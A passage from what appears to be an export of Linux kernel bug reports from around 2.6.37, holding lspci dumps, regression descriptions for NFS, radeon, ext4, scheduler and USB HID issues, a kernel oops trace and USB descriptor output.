PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Slot #2, PowerLimit 6.500W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet+ CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [90] Subsystem: Acer Incorporated [ALI] Device 0107 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed+ WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- VC1: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable- ID=0 ArbSelect=Fixed TC/VC=00 Status: NegoPending- InProgress- Capabilities: [180 v1] Root Complex Link Desc: PortNumber=01 ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c001 00:1c.1 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 2 (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=03, subordinate=04, sec-latency=0 I/O behind bridge: 00003000-00003fff Memory behind bridge: d8000000-d9ffffff Prefetchable memory behind bridge: 00000000d2000000-00000000d3ffffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s unlimited, L1 unlimited ExtTag- RBE- FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #2, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;1us, L1 &lt;4us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x0, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Slot #3, PowerLimit 6.500W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet+ CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet- Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [90] Subsystem: Acer Incorporated [ALI] Device 0107 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed+ WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=ff Status: NegoPending- InProgress- VC1: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable- ID=0 ArbSelect=Fixed TC/VC=00 Status: NegoPending- InProgress- Capabilities: [180 v1] Root Complex Link Desc: PortNumber=02 ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c001 00:1c.2 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 3 (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=05, subordinate=06, sec-latency=0 I/O behind bridge: 00004000-00004fff Memory behind bridge: da000000-dbffffff Prefetchable memory behind bridge: 00000000d4000000-00000000d5ffffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s unlimited, L1 unlimited ExtTag- RBE- FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #3, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;256ns, L1 &lt;4us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Slot #4, PowerLimit 6.500W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet+ CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [90] Subsystem: Acer Incorporated [ALI] Device 0107 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed+ WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- VC1: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable- ID=0 ArbSelect=Fixed TC/VC=00 Status: NegoPending- InProgress- Capabilities: [180 v1] Root Complex Link Desc: PortNumber=03 ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c001 00:1d.0 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #1 (rev 02) (prog-if 00 [UHCI]) Subsystem: Acer Incorporated [ALI] Device 0107 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 23 Region 4: I/O ports at 1800 [size=32] Kernel driver in use: uhci_hcd 00:1d.1 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #2 (rev 02) (prog-if 00 [UHCI]) Subsystem: Acer Incorporated [ALI] Device 0107 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at 1820 [size=32] Kernel driver in use: uhci_hcd 00:1d.2 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #3 (rev 02) (prog-if 00 [UHCI]) Subsystem: Acer Incorporated [ALI] Device 0107 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF</t>
  </si>
  <si>
    <t>NFS broken for NOMMU</t>
  </si>
  <si>
    <t>2011-01-06 22:55 UTC</t>
  </si>
  <si>
    <t>Mark Salter</t>
  </si>
  <si>
    <t>2011-02-02 23:52 UTC</t>
  </si>
  <si>
    <t>This patch broke NFS for nommu kernels because of the use of vm_map_ram()/vm_unmap_ram() which don't exist for nommu. commit 56e4ebf877b6043c289bda32a5a7385b80c17dee Author: Bryan Schumaker &lt;bjschuma@netapp.com&gt; Date: Wed Oct 20 15:44:37 2010 -0400 NFS: readdir with vmapped pages When trying to boot from an NFS root, I hit: BUG: failure at /linux-2.6/mm/nommu.c:419/vm_map_ram()!</t>
  </si>
  <si>
    <t>2.6.36 regression: reboot after poweroff - HP6930p</t>
  </si>
  <si>
    <t>3.1.9</t>
  </si>
  <si>
    <t>2011-01-09 20:45 UTC</t>
  </si>
  <si>
    <t>2013-07-01 06:08 UTC</t>
  </si>
  <si>
    <t>Poweroff works fine on my laptop (hp6930p) with 2.6.34/35 but broke with .36/7 . When using one of those kernels it powers off and boots immediately afterwards (i.e same as a reboot). When googling I found an older report: http://marc.info/?l=linux-kernel&amp;m=127012918316305&amp;w=4 which describes a similar issue but with an older kernel. I have talked with Matthew Garrett on IRC and he said that it probably is a GPE related issue.</t>
  </si>
  <si>
    <t>acpi_power-fan</t>
  </si>
  <si>
    <t>Screen flickering with 2.6.37 [ATI X1600]</t>
  </si>
  <si>
    <t>2011-01-11 22:53 UTC</t>
  </si>
  <si>
    <t>Andrea Iob</t>
  </si>
  <si>
    <t>2011-03-02 09:58 UTC</t>
  </si>
  <si>
    <t>Created attachment 43282 [details] dmesg when flickering is present Starting from 2.6.37 the screen on my Toshiba Satellite A100 flickers as soon as kernel modesetting is initialized. The flickering does not occur always: sometimes the screen is almost unreadable, sometimes there is no flickering at all. With 2.6.36 (and previous versions) I've never experienced flickering problems.</t>
  </si>
  <si>
    <t>[bisected] blank screen with radeon.modeset=1</t>
  </si>
  <si>
    <t>2011-01-12 02:41 UTC</t>
  </si>
  <si>
    <t>2011-02-19 23:43 UTC</t>
  </si>
  <si>
    <t>Hi, On 2.6.37, I get blank screen with my RV630 desktop radeon with KMS on (kernel parameter radeon.modeset=1). 2.6.36 works fine. The computer does not crash, the only symptom I can find is no signal to the screen. I have bisected the problem down to this commit: ------------------------------------------------------------ 48dfaaeb6637240af3089bf9b7a00a6cf24e0182 is the first bad commit commit 48dfaaeb6637240af3089bf9b7a00a6cf24e0182 Author: Alex Deucher &lt;alexdeucher@gmail.com&gt; Date: Wed Sep 29 11:37:41 2010 -0400 drm/radeon/kms: remove new pll algo The recent changes to the old algo (prefer high post div) coupled with the range and precision limitations of using fixed point with the new algo make the new algo less useful. So drop the new algo. This should work as well or better than the old new/old combinations and simplifies the code a lot. Fixes: https://bugs.freedesktop.org/show_bug.cgi?id=30218 among others. Signed-off-by: Alex Deucher &lt;alexdeucher@gmail.com&gt; Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt; ------------------------------------------------------------ lspci -v: ------------------------------------------------------------ 01:00.0 VGA compatible controller: ATI Technologies Inc RV630 [Radeon HD 2600 Series] (prog-if 00 [VGA controller]) Subsystem: PC Partner Limited Device e410 Flags: bus master, fast devsel, latency 0, IRQ 16 Memory at d0000000 (64-bit, prefetchable) [size=256M] Memory at fe620000 (64-bit, non-prefetchable) [size=64K] I/O ports at e000 [size=256] Expansion ROM at fe600000 [disabled] [size=128K] Capabilities: [50] Power Management version 3 Capabilities: [58] Express Legacy Endpoint, MSI 00 Capabilities: [a0] MSI: Enable- Count=1/1 Maskable- 64bit+ Capabilities: [100] Vendor Specific Information: ID=0001 Rev=1 Len=010 &lt;?&gt; 01:00.1 Audio device: ATI Technologies Inc RV630/M76 audio device [Radeon HD 2600 Series] Subsystem: PC Partner Limited Device aa08 Flags: bus master, fast devsel, latency 0, IRQ 67 Memory at fe630000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 3 Capabilities: [58] Express Legacy Endpoint, MSI 00 Capabilities: [a0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Capabilities: [100] Vendor Specific Information: ID=0001 Rev=1 Len=010 &lt;?&gt; Kernel driver in use: HDA Intel ------------------------------------------------------------ I tried to diagnose this further with `radeontool regs', but there is no difference in the output between the last good commit (f28488c2) with screen in the working state and the first bad commit (48dfaaeb) with the screen blanked. Here's its output with a text console on the screen (no X): ------------------------------------------------------------ RADEON_DAC_CNTL 00000000 RADEON_DAC_EXT_CNTL 00000000 RADEON_DAC_MACRO_CNTL 00000000 RADEON_DAC_CNTL2 00000000 RADEON_TV_DAC_CNTL 00000000 RADEON_DISP_OUTPUT_CNTL 00000000 RADEON_CONFIG_MEMSIZE 00000000 RADEON_AUX_SC_CNTL 2ba7a25e RADEON_CRTC_EXT_CNTL 00000000 RADEON_CRTC_GEN_CNTL 00000000 RADEON_CRTC2_GEN_CNTL 00000000 RADEON_DEVICE_ID 00000000 RADEON_DISP_MISC_CNTL 00000000 RADEON_GPIO_MONID 00000000 RADEON_GPIO_MONIDB 00000000 RADEON_GPIO_CRT2_DDC 00000000 RADEON_GPIO_DVI_DDC 00000000 RADEON_GPIO_VGA_DDC 00000000 RADEON_LVDS_GEN_CNTL 00000000 RADEON_LVDS_PLL_CNTL 00000000 RADEON_FP_GEN_CNTL 00000000 RADEON_FP2_GEN_CNTL 00000000 RADEON_PPLL_CNTL 00000000 RADEON_PPLL_REF_DIV 00000000 RADEON_PPLL_DIV_3 00000000 RADEON_PIXCLKS_CNTL 00000000 RADEON_P2PLL_CNTL 00000000 RADEON_P2PLL_REF_DIV 00000000 RADEON_P2PLL_DIV_0 00000000 RADEON_VCLK_ECP_CNTL 00000000 RADEON_MEM_TIMING_CNTL 00000000 RADEON_TMDS_PLL_CNTL 00000000 RADEON_TMDS_TRANSMITTER_CNTL 00000000 RADEON_CRTC_MORE_CNTL 00000000 RADEON_FP_H_SYNC_STRT_WID 00000000 RADEON_FP_V_SYNC_STRT_WID 00000000 RADEON_FP_CRTC_H_TOTAL_DISP 00000000 RADEON_FP_CRTC_V_TOTAL_DISP 00000000 RADEON_FP_HORZ_STRETCH 00000000 RADEON_FP_VERT_STRETCH 00000000 RADEON_FP_HORZ_VERT_ACTIVE 00000000 RADEON_CRTC_H_TOTAL_DISP 00000000 RADEON_CRTC_H_SYNC_STRT_WID 00000000 RADEON_CRTC_V_TOTAL_DISP 00000000 RADEON_CRTC_V_SYNC_STRT_WID 00000000 RADEON_CRTC2_H_TOTAL_DISP 0200000f RADEON_CRTC2_H_SYNC_STRT_WID 00000000 RADEON_CRTC2_V_TOTAL_DISP 00000100 RADEON_CRTC2_V_SYNC_STRT_WID 00000002 ------------------------------------------------------------ If there's anything further you need me to do to diagnose this, I'll be happy to help.</t>
  </si>
  <si>
    <t>BUG in fs/inode.c:429</t>
  </si>
  <si>
    <t>2011-01-12 19:17 UTC</t>
  </si>
  <si>
    <t>2011-08-11 07:57 UTC</t>
  </si>
  <si>
    <t>Subject : BUG in fs/inode.c:429 Submitter : Florian Kriener &lt;florian@kriener.org&gt; Date : 2011-01-06 16:35 Message-ID : 201101061735.40060.florian@kriener.org References : http://marc.info/?l=linux-kernel&amp;m=129433235223735&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>NPD when using sb-&gt;s_fs_info during clean-up after a failed mount</t>
  </si>
  <si>
    <t>2011-01-14 22:31 UTC</t>
  </si>
  <si>
    <t>2011-03-30 23:30 UTC</t>
  </si>
  <si>
    <t>When ext4_mb_init() fails during mount operation (for example, if one of the calls to kmalloc returns NULL), s_fs_info field of the superblock structure is set to NULL. However, this field is dereferenced later when cleaning up, which results in an oops in ext4_sync_fs(). I have tested this for mainline kernel from git (commit e9688f6 of January 11, 2011, i.e. post-2.6.37). When attempting to mount a loop device attached to a file with ext4 filesystem in it, the following call to kmalloc() returned NULL (fs/ext4/mballoc.c:2437): i = (sb-&gt;s_blocksize_bits + 2) * sizeof(*sbi-&gt;s_mb_maxs); sbi-&gt;s_mb_maxs = kmalloc(i, GFP_KERNEL); ext4_mb_init() returns -ENOMEM as it should, and at the end of ext4_fill_super() s_fs_info field of the corresponding struct super_block instance is set to NULL (fs/ext4/super.c:3686): out_fail: sb-&gt;s_fs_info = NULL; But after that, there is an attempt to dereference sb-&gt;s_fs_info in ext4_sync_fs(), for example (fs/ext4/super.c:4123): struct ext4_sb_info *sbi = EXT4_SB(sb); ... flush_workqueue(sbi-&gt;dio_unwritten_wq); 'sbi' is NULL in the last statement in this case. This is how the result looks in the system log: --------------------- [ 817.573625] EXT4-fs (loop0): failed to initialize mballoc (-12) [ 817.573627] EXT4-fs (loop0): mount failed [ 817.573985] BUG: unable to handle kernel NULL pointer dereference at 0000021c [ 817.573988] IP: [&lt;f8a25db3&gt;] ext4_sync_fs+0x23/0xb0 [ext4] [ 817.574006] *pde = 00000000 [ 817.574007] Oops: 0000 [#1] SMP [ 817.574009] last sysfs file: /sys/devices/virtual/block/loop0/queue/hw_sector_size [ 817.574012] Modules linked in: fuse ext4 jbd2 crc16 kedr_controller kedr_indicator_caller kedr_fsim_capable kedr_fsim_user_space_access kedr_fsim_custom kedr_fault_simulation kedr_base snd_pcm_oss snd_mixer_oss snd_seq snd_seq_device edd af_packet mperf loop dm_mod ppdev snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm parport_pc parport snd_timer e1000 snd ac sr_mod sg cdrom soundcore i2c_piix4 button snd_page_alloc pcspkr ohci_hcd ehci_hcd rtc_cmos rtc_core rtc_lib sd_mod usbcore fan processor ata_generic ata_piix thermal thermal_sys hwmon ahci libahci libata scsi_mod [last unloaded: speedstep_lib] [ 817.574043] [ 817.574049] Pid: 6093, comm: mount Not tainted 2.6.37-testbox+ #1 /VirtualBox [ 817.574051] EIP: 0060:[&lt;f8a25db3&gt;] EFLAGS: 00010246 CPU: 1 [ 817.574057] EIP is at ext4_sync_fs+0x23/0xb0 [ext4] [ 817.574059] EAX: f64f9600 EBX: 00000000 ECX: f8a25d90 EDX: 00000000 [ 817.574060] ESI: f64f9600 EDI: 00000000 EBP: e5fbde3c ESP: e5fbde24 [ 817.574062] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 817.574064] Process mount (pid: 6093, ti=e5fbc000 task=f64364f0 task.ti=e5fbc000) [ 817.574065] Stack: [ 817.574066] f64f9600 00000000 c033a2e0 f64f9600 00000000 c033a2e0 e5fbde50 c031daad [ 817.574070] f64f9600 00000003 f8a47460 e5fbde5c c031db21 f64f9600 e5fbde78 c02fc169 [ 817.574074] e5fbde90 c03490c7 f413d680 00000003 ffffffea e5fbde88 c02fc235 f64f9600 [ 817.574078] Call Trace: [ 817.574083] [&lt;c033a2e0&gt;] ? dquot_quota_sync+0x0/0x2c0 [ 817.574086] [&lt;c033a2e0&gt;] ? dquot_quota_sync+0x0/0x2c0 [ 817.574088] [&lt;c031daad&gt;] __sync_filesystem+0x5d/0x90 [ 817.574090] [&lt;c031db21&gt;] sync_filesystem+0x21/0x50 [ 817.574093] [&lt;c02fc169&gt;] generic_shutdown_super+0x29/0xd0 [ 817.574096] [&lt;c03490c7&gt;] ? disk_name+0xb7/0xd0 [ 817.574098] [&lt;c02fc235&gt;] kill_block_super+0x25/0x40 [ 817.574101] [&lt;c02fc4a5&gt;] deactivate_locked_super+0x35/0x50 [ 817.574103] [&lt;c02fcf10&gt;] mount_bdev+0x190/0x1b0 [ 817.574109] [&lt;f8a24e9a&gt;] ext4_mount+0x1a/0x20 [ext4] [ 817.574116] [&lt;f8a2d390&gt;] ? ext4_fill_super+0x0/0x2af0 [ext4] [ 817.574118] [&lt;c02fc6c0&gt;] vfs_kern_mount+0x70/0x230 [ 817.574121] [&lt;c031160e&gt;] ? get_fs_type+0x2e/0xb0 [ 817.574127] [&lt;f8a24e80&gt;] ? ext4_mount+0x0/0x20 [ext4] [ 817.574129] [&lt;c02fc8d9&gt;] do_kern_mount+0x39/0xd0 [ 817.574132] [&lt;c031410a&gt;] do_mount+0x35a/0x6b0 [ 817.574135] [&lt;c02d34a9&gt;] ? strndup_user+0x49/0x70 [ 817.574137] [&lt;c03146e6&gt;] sys_mount+0x66/0xa0 [ 817.574140] [&lt;c0202e5c&gt;] sysenter_do_call+0x12/0x28 [ 817.574141] Code: ff e9 ce fe ff ff 66 90 55 89 e5 83 ec 18 89 7d fc 89 d7 8b 15 84 14 a5 f8 89 75 f8 89 c6 89 5d f4 8b 98 7c 01 00 00 85 d2 75 52 &lt;8b&gt; 83 1c 02 00 00 e8 02 4f 83 c7 8b 83 34 01 00 00 8d 55 f0 e8 [ 817.574165] EIP: [&lt;f8a25db3&gt;] ext4_sync_fs+0x23/0xb0 [ext4] SS:ESP 0068:e5fbde24 [ 817.574173] CR2: 000000000000021c [ 817.574175] ---[ end trace 026cbf7663053768 ]--- --------------------- The problem also shows up in 2.6.34.7. NPD is in a different place (fs/ext4/super.c:828, invocation of EXT4_JOURNAL(inode) in ext4_clear_inode()) but it occurs for the same reason as described above. The failures of that call to kmalloc() can be rare in practice, but still. For testing purposes, the failure was "injected" into ext4 module by the dynamic analysis system, KEDR (http://kedr.berlios.de/), we have developed at ISPRAS.</t>
  </si>
  <si>
    <t>[2.6.37 regression] threads with CPU affinity cannot be killed</t>
  </si>
  <si>
    <t>2011-01-16 13:39 UTC</t>
  </si>
  <si>
    <t>tim blechmann</t>
  </si>
  <si>
    <t>2011-02-12 23:18 UTC</t>
  </si>
  <si>
    <t>my application uses multiple threads, that run with SCHED_FIFO scheduling and that are pinned to separate physical CPUs. starting with 2.6.37, the application stopped working and i cannot kill the processes any more with SIGKILL. i am also under the impression, that the threads, which are pinned to separate CPUs are never actually dispatched. 2.6.36 and used to work fine ...</t>
  </si>
  <si>
    <t>2.6.37 breaks USB wireless presenter HID device</t>
  </si>
  <si>
    <t>2011-01-17 10:53 UTC</t>
  </si>
  <si>
    <t>Commit 6bc235a2e24a5ef677daee3fd4f74f6cd643e23c breaks the GeneralKeys wireless USB presenter. The commit message indicates that a new driver for a "leg-shakes sensor device" is added, but this device definitely isn't one. When I plug in the device with 2.6.37, the 'yurex' driver is loaded and fails to initialize. With 2.6.36, the device is treated as a generic HID device and works perfectly. Bus 001 Device 013: ID 0c45:1010 Microdia Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 8 idVendor 0x0c45 Microdia idProduct 0x1010 bcdDevice 0.01 iManufacturer 1 Device iProduct 2 USB Device iSerial 0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 84 bNumInterfaces 3 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xa0 (Bus Powered) Remote Wakeup MaxPower 100mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 3 Human Interface Device bInterfaceSubClass 1 Boot Interface Subclass bInterfaceProtocol 1 Keyboard iInterface 0 HID Device Descriptor: bLength 9 bDescriptorType 33 bcdHID 1.00 bCountryCode 0 Not supported bNumDescriptors 1 bDescriptorType 34 Report wDescriptorLength 63 Report Descriptor: (length is 63) Item(Global): Usage Page, data= [ 0x01 ] 1 Generic Desktop Controls Item(Local ): Usage, data= [ 0x06 ] 6 Keyboard Item(Main ): Collection, data= [ 0x01 ] 1 Application Item(Global): Usage Page, data= [ 0x07 ] 7 Keyboard Item(Local ): Usage Minimum, data= [ 0xe0 ] 224 Control Left Item(Local ): Usage Maximum, data= [ 0xe7 ] 231 GUI Right Item(Global): Logical Minimum, data= [ 0x00 ] 0 Item(Global): Logical Maximum, data= [ 0x01 ] 1 Item(Global): Report Size, data= [ 0x01 ] 1 Item(Global): Report Count, data= [ 0x08 ] 8 Item(Main ): Input, data= [ 0x02 ] 2 Data Variable Absolute No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Global): Report Count, data= [ 0x01 ] 1 Item(Global): Report Size, data= [ 0x08 ] 8 Item(Main ): Input, data= [ 0x01 ] 1 Constant Array Absolute No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Global): Report Count, data= [ 0x05 ] 5 Item(Global): Report Size, data= [ 0x01 ] 1 Item(Global): Usage Page, data= [ 0x08 ] 8 LEDs Item(Local ): Usage Minimum, data= [ 0x01 ] 1 NumLock Item(Local ): Usage Maximum, data= [ 0x05 ] 5 Kana Item(Main ): Output, data= [ 0x02 ] 2 Data Variable Absolute No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Global): Report Count, data= [ 0x01 ] 1 Item(Global): Report Size, data= [ 0x03 ] 3 Item(Main ): Output, data= [ 0x01 ] 1 Constant Array Absolute No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Global): Report Count, data= [ 0x06 ] 6 Item(Global): Report Size, data= [ 0x08 ] 8 Item(Global): Logical Minimum, data= [ 0x00 ] 0 Item(Global): Logical Maximum, data= [ 0x68 ] 104 Item(Global): Usage Page, data= [ 0x07 ] 7 Keyboard Item(Local ): Usage Minimum, data= [ 0x00 ] 0 No Event Item(Local ): Usage Maximum, data= [ 0x68 ] 104 F13 Item(Main ): Input, data= [ 0x00 ] 0 Data Array Absolute No_Wrap Linear Preferred_State No_Null_Position Non_Volatile Bitfield Item(Main ): End Collection, data=none Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0008 1x 8 bytes bInterval 10 Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 1 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 3 Human Interface Device bInterfaceSubClass 1 Boot Interface Subclass bInterfaceProtocol 2 Mouse iInterface 0 HID Device Descriptor: bLength 9 bDescriptorType 33 bcdHID 1.10 bCountryCode 0 Not supported bNumDescriptors 1 bDescriptorType 34 Report wDescriptorLength 52 Report Descriptor: (length is 52) Item(Global): Usage Page, data= [ 0x01 ] 1 Generic Desktop Controls Item(Local ): Usage, data= [ 0x02 ] 2 Mouse Item(Main ): Collection, data= [ 0x01 ] 1 Application Item(Local ): Usage, data= [ 0x01 ] 1 Pointer Item(Main ): Collection, data= [ 0x00 ] 0 Physical Item(Global): Usage Page, data= [ 0x09 ] 9 Buttons Item(Local ): Usage Minimum, data= [ 0x01 ] 1 Button 1 (Primary) Item(Local ): Usage Maximum, data= [ 0x05 ] 5 Button 5 Item(Global): Logical Minimum, data= [ 0x00 ] 0 Item(Global): Logical Maximum, data= [ 0x01 ] 1 